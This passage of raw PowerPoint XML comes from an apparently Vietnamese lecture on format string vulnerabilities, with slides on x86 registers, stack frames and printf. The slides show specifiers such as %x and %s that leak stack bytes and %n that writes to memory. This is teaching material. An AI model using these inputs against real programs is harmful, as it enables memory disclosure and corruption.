                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2155587A-FB2C-780D-7444-B4548C1B89CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4400137" y="3483018"/>
            <a:ext cx="1305187" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>printf()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>stack frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33306980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BF45-7705-495E-9D2F-609292451FD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng xâu định dạng</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA00090-5C53-4252-9C9B-E8FB9DC760C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>buf = “%d” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> thực thi lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>printf(“%d”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hiển thị 4 byte phía tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ớc địa chỉ đầu tiên của stack frame của hàm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>buf = “%s” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> thực thi lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>printf(“%s”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hiển thị các byte cho tới khi gặp ký tự kết thúc xâu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>buf = “%d%d%d…” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> thực thi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>printf(“%d%d%d…”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hiển thị chuỗi byte d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ới dạng số nguyên</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>printf(“%x%x%x…”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hiển thị chuỗi byte d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ới dạng hexa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>printf(“…%n”):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> số byte đã hiển thị vào vùng nhớ</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CACCBDB-196A-48A8-B9F1-D95B17B893D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8305800" y="6362699"/>
            <a:ext cx="533400" cy="329184"/>
          </a:xfrm>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339749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7CC8-09C6-E0EC-F8B3-370E36002203}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Giới thiệu chung về kiến trúc x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA1DFED5-6774-437A-9278-6B98C0BD74F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Sử dụng kiến trúc tập lệnh CISC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Mã lệnh có độ dài 1-16 byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tài liệu tập lệnh: 5000 trang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Little-edian: byte có ý nghĩa thấp được ghi trên ô nhớ có địa chỉ thấp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tập thanh ghi x86:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>EAX, EBX, ECX, EDX, ESI, EDI: Thanh ghi đa mục đích</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ESP: Thanh ghi con trỏ stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>EBP: Thanh ghi con trỏ cơ sở</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>EIP: Thanh ghi con trỏ lệnh</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E93C3DDD-9717-7968-F172-1240A6622368}"/>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80445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EA4B-4F2A-4B28-A882-DEF469A9BCCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng xâu định dạng: Ghi đè</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93686E48-67C0-40C4-86CC-718B33CF7D32}"/>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5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7098A514-BDF4-41B9-A9AC-61649B3A1A4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="1888759"/>
            <a:ext cx="4152912" cy="8000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rgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5E49A4-1E1E-4D92-AC0A-1095B7325CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944882" y="1888759"/>
            <a:ext cx="3393744"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39A26A80-6C6B-4345-877B-07F911CBC9EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86346" y="1996768"/>
            <a:ext cx="8729663"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8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A14D56-FA90-4C81-B8B0-4E584FDEACF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3420245" y="2035602"/>
            <a:ext cx="838198"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rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F1F0B2A-2A81-476D-888C-E82F8B54BF0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1652551" y="2029252"/>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%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB0C8356-ABD3-4852-8E97-E9DF5477305C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2533613" y="2035602"/>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%eip</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C589C1AE-9FCD-496A-9E4F-2D76A8373670}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2790458"/>
            <a:ext cx="3147986" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’s stack frame</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B804BDF2-AA69-4626-A6A1-ADDE1236F318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6038899" y="2796867"/>
            <a:ext cx="1938338" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Caller’s stack frame</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8841FBC8-0A7F-4573-8D78-2241B87EA160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7558138" y="2035602"/>
            <a:ext cx="838198"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rPr>
              <a:t>args</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B35E5AEB-DB70-4BAC-9F6B-F37FC6295DA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5782850" y="2016763"/>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%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A314C2F-E4A8-488A-8B59-EFDAEB0B87C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6663912" y="2023113"/>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%eip</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE1285D-9A63-4751-B9B5-0CC1CA72B485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4603121" y="2054268"/>
            <a:ext cx="1070877"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11</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D86C4EC0-C441-4FD9-9EB3-806DDCB38129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="2650998"/>
            <a:ext cx="1437920" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[value list]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D522271-E85E-4639-9D1E-C140FB0D35E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1886939" y="3383936"/>
            <a:ext cx="2716182" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf(“Hello World%n”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40941FCE-BA3C-4662-A82A-DBC275763226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3472070" y="3002889"/>
            <a:ext cx="914400" cy="355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01D526-1647-4067-BFEE-A84F445B4772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3882860" y="3075163"/>
            <a:ext cx="1668050" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hiểu nhầm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83DA0993-E5D3-4172-8C68-7BC4DFEAFCB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440768" y="1447800"/>
            <a:ext cx="4114800" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>printf(char * fmt, [value list])</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4973616-4C64-4970-A96F-CB495B6EA1DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="4583668"/>
            <a:ext cx="3048000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf(“Hello World%n”, n);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Right Brace 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59656E71-F13F-45CE-8673-F92290AF3741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3495800" y="3729012"/>
            <a:ext cx="166426" cy="151922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E926F8D-8D4A-41D0-963C-B2B588F57C93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2698058" y="4101908"/>
            <a:ext cx="2716182" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Format string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1538EE59-A510-4714-A119-3A5300160283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4904765" y="5053598"/>
            <a:ext cx="3424250" cy="80009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000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
